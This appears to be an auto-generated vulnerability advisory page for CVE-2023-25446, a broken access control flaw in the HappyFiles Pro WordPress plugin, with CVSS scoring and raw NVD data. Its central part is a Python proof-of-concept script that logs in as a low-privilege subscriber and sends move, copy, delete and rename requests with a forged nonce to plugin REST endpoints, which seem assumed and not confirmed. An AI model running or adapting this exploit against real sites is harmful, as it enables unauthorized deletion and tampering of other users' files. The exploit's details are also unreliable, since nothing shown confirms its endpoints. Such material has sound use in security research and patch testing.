Security Vulnerability Report
中文
CVE-2023-25446 CVSS 7.7 HIGH

CVE-2023-25446

Published: 2025-12-21 01:15:51
Last Modified: 2026-04-28 19:19:46

Description

Missing Authorization vulnerability in HappyFiles HappyFiles Pro happyfiles-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HappyFiles Pro: from n/a through 1.8.1.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

HappyFiles Pro <= 1.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2023-25446 HappyFiles Pro Authorization Bypass PoC # This PoC demonstrates the broken access control vulnerability import requests import json target_url = "http://target-wordpress-site.com" # Target specific HappyFiles Pro endpoints endpoints = [ "/wp-json/happyfiles/pro/move", "/wp-json/happyfiles/pro/copy", "/wp-json/happyfiles/pro/delete", "/wp-json/happyfiles/pro/rename" ] # Low-privilege user credentials (subscriber role) low_priv_user = "lowpriv_user" low_priv_pass = "password123" # Target file ID to manipulate (enumerated or known) target_file_id = 123 def exploit_authorization_bypass(): """ Exploit CVE-2023-25446 by sending requests with low-privilege credentials to access/modify files belonging to other users """ session = requests.Session() # Login as low-privilege user login_data = { 'log': low_priv_user, 'pwd': low_priv_pass } session.post(f"{target_url}/wp-login.php", data=login_data) # Exploit each vulnerable endpoint for endpoint in endpoints: exploit_data = { 'file_id': target_file_id, 'target_folder_id': 999, # Arbitrary target folder 'nonce': 'manipulated_or_missing_nonce' } try: response = session.post( f"{target_url}{endpoint}", json=exploit_data, headers={'Content-Type': 'application/json'} ) # Check if unauthorized operation succeeded if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint} - Operation succeeded!") print(f" Response: {response.text}") else: print(f"[-] Protected: {endpoint} - Status: {response.status_code}") except Exception as e: print(f"[!] Error testing {endpoint}: {str(e)}") if __name__ == "__main__": print("CVE-2023-25446 HappyFiles Pro Authorization Bypass Test") print("=" * 60) exploit_authorization_bypass()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-25446", "sourceIdentifier": "[email protected]", "published": "2025-12-21T01:15:50.993", "lastModified": "2026-04-28T19:19:45.917", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in HappyFiles HappyFiles Pro happyfiles-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HappyFiles Pro: from n/a through 1.8.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://vdp.patchstack.com/database/wordpress/plugin/happyfiles-pro/vulnerability/wordpress-happyfiles-pro-plugin-1-8-1-broken-access-control?_s_id=cve", "source": "[email protected]"}]}}